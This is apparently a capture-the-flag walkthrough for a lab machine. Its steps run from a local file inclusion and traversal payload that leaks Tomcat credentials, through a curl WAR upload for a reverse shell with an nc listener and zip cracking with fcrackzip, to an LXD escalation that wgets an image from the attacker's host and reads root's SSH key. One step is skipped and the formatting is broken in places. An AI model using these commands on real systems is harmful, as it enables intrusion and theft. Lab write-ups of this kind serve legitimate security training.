Professional Documents
Culture Documents
----------------------------------------
Enumerating port 80 we see a new subdomain megahosting.htb .
Add it to your host file at /etc/hosts
Foothold
----------------------------------------
There is an lfi at http://megahosting.htb/news.php?file=
So we can see by doing something like http://megahosting.htb/news.php?file=../../../../../etc/hosts
we get directory traversal.
Looking at port 8080 we find it's tomcat9 and it mentions /etc/tomcat9/tomcat-users.xml has user
info. But it returns nothing , so we need the correct path.
So just do http://megahosting.htb/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-
users.xml and get the creds
```
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
```
using the above we can access the gui for host manager.
Reverse Shell
------------------------------------------
Tomcat can let us gain rev shell via uploading our payload as .war file. We can use curl to upload
it to the webroot.
```
To upload just do
```
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file payload.war
"http://10.10.10.194:8080/manager/text/deploy?path=/payload.war"
```
Set up listener with nc -lvnp 1234 and go to tabby.htb:8080/payload.war and you should get a reverse
shell.
so we copied it locally by base64 backupfilename.zip and on our local machine echo "<paste
base64code>"|base64 -d >backup.zip
```
fcrackzip -v -D -u -p ./rockyou.txt backup.zip
```
which returns us the creds admin@it admin@it
Testing it via su ash we get access to ash and get the user.txt
Privesc to Root
-------------------------------------------------
We see that ash is part of lxd group. So according to article https://www.hackingarticles.in/lxd-
privilege-escalation/ we just follow the steps and get root .
You will get a tar.gz file. Set up http server and copy it to the remote machine
```
wget yourip/filename.tar.gz
```
Then just do the following in order
```
lxc image import ./yourfilename.tar.gz --alias myimage
lxc image list (this should show you your image got loaded)
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
cd /mnt/root
cd /root/
cat root.txt
```
Also you can get the root's rsa key from /root/.ssh/id_rsa
----------------------------------------------------------------------------------